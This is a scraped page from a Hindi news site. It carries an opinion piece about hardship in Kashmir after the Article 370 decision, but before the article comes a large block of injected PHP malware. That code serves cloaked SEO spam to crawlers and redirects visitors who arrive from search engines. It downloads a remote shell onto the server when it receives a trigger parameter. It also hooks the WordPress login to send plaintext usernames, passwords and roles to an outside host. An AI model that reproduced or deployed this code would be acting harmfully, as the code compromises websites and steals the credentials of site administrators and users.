if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!doctype html > <!--[if IE 8]> <html class="ie8" lang="en"> <![endif]--> <!--[if IE 9]> <html class="ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html lang="en-US"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="pingback" href="https://muslimera.com/xmlrpc.php" /> <title>सुनिए जन्नत में फाक़े हैं। – Muslim Era
Thursday, March 23, 2023
Home मुस्लिम एरा लेख सुनिए जन्नत में फाक़े हैं।

सुनिए जन्नत में फाक़े हैं।

1216
0

जी हां आपको चौंकने की जरूरत नहीं है में सच कह रहा हूं और यूंही नहीं कह रहा हूं चश्मदीद गवाहों की जबानी सुनी कह रहा हूं, अब आप मुझे बताइए क्या आपको जन्नत जाना है वहां भुकमरी है,बीमारी है, खौफ है जी हां न वहां दूध की नदियां बह रही हैं ,न ही खूबसूरत नज़ारे दिलों को खुश कर रहे हैं हर तरफ पसरा है गहरा सन्नाटा ,खौफ ,बिलखने की आवाजे,अब मुझे काफिर कहने का दिल कर रहा होगा आपको मै पागल लग रहा हूंगा लेकिन मै पहले ही कह चुका हूं कि मैं यह सब चश्मदीद गवाहों के बयान के आधार पर कह रहा हूं।

आपने कभी दवा के आभाव में अपने बच्चे को तड़प तड़प कर मरते देखा है सिर्फ दवा ही नहीं बच्चा 3 दिन का भूका भी हो अगर नहीं देखा है तो जन्नत आइए आपको यह नजारा भी मिल जाएगा,बाप की आंखों में बेपनाह लाचारगी और मां का असीम दुख से पागल हो जाना यह भी जन्नत का एक नजारा है,सिर्फ इतना ही नहीं लाशों का हुजूम भी जन्नत में है अब तो आपने पक्का यकीन कर लिया होगा कि या तो में पागल हो गया हूं या फिर नास्तिक लेकिन सुनिए न तो में नास्तिक हुआ हूं और न ही मैं पागल हो गया हूं मैं बस आपको चीखती चट्टानों की आवाज़ सुना रहा हूं।

जब ज़बान पर पहरा हो तब खामोशी बोलती है और उसकी आवाज़ की गूंज से कान के पर्दे फट जाते है आपको अब में दार्शनिक लग रहा हूंगा क्योंकि में आपको शब्दों के मकड़जाल में बांधने की कोशिश जो कर रहा हूं तो सुनिए मैं शब्दों का चयन नहीं कर पा रहा हूं दर्द को बयान करने के लिए चार दिन से भूके बच्चे के चेहरे पर मां की नजर किस तरह जाती है आप ही बताइए इसके लिए कौनसा शब्द है जिससे पीड़ा बयान की जा सके आप भी हांथ खड़े कर दीजिए क्योंकि झूठी तसल्ली के सिवा आपके पास भी कुछ नहीं है।

जाने दीजिए मेरे बारे में कोई राय बनाने में माथापच्ची मत कीजिए मै आपकी परेशानी खतम कर देता हूं मै ईश्वर की बनाई उस जन्नत की बात नहीं कर रहा हूं जहां 70- 70 हूरे मिलेंगी,दूध और शहद की नदियां होंगी कोई बीमारी नहीं होगी सब जवान होंगे , मैं बात कर रहा हूं दर्द से कराहती वादी की ,जी हां उसी वादी की जिसके बारे में कहा गया कि गर फ़िरदौस बर रुए ज़मीं अस्त हमीअस्त हमींअस्त यानी अगर ज़मीन पर कहीं जन्नत है तो वह यहीं है यहीं है अब तो आप समझ गए होंगे कि मै कश्मीर की बात कर रहा हूं।
जी हां कश्मीर भारत का अभिन्न अंग जहां आजकल मौत सी खामोशी है 5 अगस्त 2019 से आजतक जहां गहरा सन्नाटा है,वजह आप जानते हैं भारतीय संसद द्वारा धारा 370 के संबंध में लिए गए फैसले के बाद से आजतक हालात ऐसे है कि अपने खूबसूरत नजारों के लिए मशहूर घाटी जिसे
देखकर अनायास ही मुंह से वाह कश्मीर निकल जाता था आज सिर्फ कह सकते हैं आह कश्मीर,

आपको यहां एक बात और बताता चलूं कि कुछ लोग सेव कश्मीर का हैशटैग भी चला रहे हैं सोशल मीडिया पर उनका दर्द हर सोशल प्लेटफार्म पर दिख रहा है लेकिन इसकी भी पड़ताल होनी चाहिए कि क्या सत्य में इस अभियान को शुरू करने वालों का सियासत के आकाओं से कोई संबंध नहीं क्योंकि देश का एक बहुत बड़ा वर्ग इसे सरकार का साहसिक फैसला मानता है और धारा 370 पर लिए गए फैसले का स्वागत कर रहा है साथ ही वहां जो प्रतिबंध लगाए गए हैं उनके संबंध में सरकार द्वारा जो तर्क दिए गए हैं उनसे संतुष्ट है तो फिर आप समझदार है मुझे कुछ कहने की जरूरत नहीं है।

आपका सवाल है अगर यह न करें तो क्या सुलगते कश्मीर को यूंही तबाह होते देखे? ज़ुल्म के खिलाफ आवाज भी बुलंद न करे ?,मेरा जवाब भी वही है बिल्कुल कीजिए ।
कश्मीर में जो भी हालात हैं उसके चार पक्ष हैं एक हमारी सरकार,एक पड़ोसी मुल्क की सरकार,एक कश्मीर के लोग और एक शेष भारत के लोग ,सरकार कह रही है कश्मीर में सब हालात सामान्य हैं आखिर यूंही तो सरकार के सुरक्षा सलाहकार अजीत डोभाल कश्मीर जाकर सड़क पर खाना नहीं खा आए यह हालात सामान्य होने का सबूत है यह और बात है कि विश्वास हुआ नहीं।

दूसरी तरफ पड़ोसी मुल्क पाकिस्तान है जिसे सुनहरा मौका मिला है भारत के खिलाफ दुनिया को लामबंद करने का और इमरान खान ने संयुक्त राष्ट्र संघ में कश्मीर को लेकर जिस तरह जज्बाती बात की उससे कश्मीर में बसने वालों में जहां पहले ही भारत के प्रति अविश्वास घर कर चुका है पाकिस्तान के प्रति प्रेम उमड़ने लगा उन्हें महसूस हुआ कि कहीं तो कोई उनके अधिकारों के लिए आवाज़ उठा रहा है,हालांकि यह सिर्फ छलावा है कश्मीर में बसने वालों की यही हार का कारण है ।

कश्मीर में सक्रिय मजहबी कट्टरपंथी जिनका धर्म से कोई लेना देना नहीं है कश्मीर को शांत नहीं होने देना चाहते हैं क्योंकि जैसे ही शांति बहाल होगी उनका नकाब नोच दिया जायेगा ,अगर ऐसा होता है तो राजनीत की बिसात पर दोनों मुल्कों की हार होगी।
भारत जहां जल्दबाजी में एक खतरनाक क़दम उठा चुका है जिसके दुष्परिणाम सामने हैं और पाकिस्तान उसका फायदा उठा रहा है वहीं जन्नत के लोगों की नासमझी भी उनकी इस हालत की ज़िम्मेदार है ,क्योंकि वह अपना मसीहा उसे समझ रहे हैं जो सिर्फ उनकी लाशों से फायदा उठाना चाहता है ,जन्नत में हालात खराब है एक रिपोर्ट के मुताबिक लगभग 13000 बच्चे गायब हैं जिनके घर वालों का आरोप है कि उन्हें पुलिस या सुरक्षा बल पूछताछ के नाम पर उठा ले गए।
वहीं सुरक्षाबलों का कहना है कि यह बच्चे लापता हैं हम इनकी तलाश कर रहे हैं,सरकार का एक और फैसला यह कि कश्मीर के अधिकतर नेता या तो जेल में हैं या फिर नजरबंद तो ऐसे में कश्मीरियों को ऐसा लग रहा है कि उनकी आवाज़ उठाने वाला कोई नहीं वहीं अगर पूरे देश में कहीं कोई भी कश्मीर की बात करता है तो उसे राष्ट्रद्रोही सरकार के लोग करार दे रहे हैं ,ऐसे में अविश्वास को विश्वास में कैसे बदला जा सकता है और इसी मौके का फायदा इमरान खान ने उठाया और अंतरराष्ट्रीय मंच पर इस मुद्दे को उठा दिया।
सरकार के इस फैसले से पहले हुए एक सर्वे में आम कश्मीरियों में से महज 1% लोगों ने ही पाकिस्तान के साथ जाने की बात की लेकिन अब जगह जगह पाकिस्तान ज़िंदाबाद के नारे लगा रहे लोगों का हुजूम दिखता है जिनकी सुरक्षाबलों के साथ मुठभेड़ होती है।

लोगों को न बड़ी मस्जिदों में इकट्ठा होने की इजाज़त है न इंटरनेट और मोबाइल सेवा ही मौजूद है ऐसे में शांति बहाल करने की कोशिश सफल होगी कहना सिर्फ ख्वाब है।
कट्टरपंथी विचार को पनपने का पूरा मौका है अगर हालात सामान्य हों तो ही विचारधारा को हरा कर कश्मीरियों में विश्वास बहाल किया जा सकता है कि सिर्फ कश्मीर ही नहीं कश्मीरी भी हमारे हैं

इधर चौथा पक्ष यानी शेष भारत जो दो हिस्सों में बटा है जिनमें कुछ इस फैसले के साथ हैं और कुछ इसके खिलाफ हालांकि दोनों ही कश्मीर को भारत का अभिन्न अंग मानते हैं लेकिन सरकार के इस फैसले पर बंटे हुए हैं, जो भारतीय राजनीति को पोषण दे रहे हैं ,एक ओर सरकार द्वारा स्थापित राष्ट्रवाद की परिभाषा के अनुरूप लोग और दूसरी तरफ सत्तापक्ष द्वारा घोषित राष्ट्रद्रोही टोली यानी सब सियासी खेल है जिसे समझना ज़रूरी है क्योंकि अगर इसे नहीं समझा गया तो नुकसान है।

कश्मीर के लोगों को भी समझना होगा कि धारा 370 हटने पर जिस तरह की प्रतिक्रिया हुई है वह उचित नहीं है क्योंकि इससे पहले भी उनकी ही अगुवाई करने वालों ने इसे कमजोर किया है और 75%से अधिक इसे समाप्त किया जा चुका था जो तथ्यात्मक सत्य है और इसमें अब कश्मीरी अवाम को गुमराह करने वाले शामिल थे ,इस बार बस इतना हुआ है कि भारत की मौजूदा सरकार ने अपने राजनैतिक एजेंडे के अनुरूप शोर मचा कर ऐसा किया है ताकि आरएसएस द्वारा चलाई जा रही मुहिम को कामयाब कर देने का संदेश जाय इससे ऊपर कुछ नहीं।
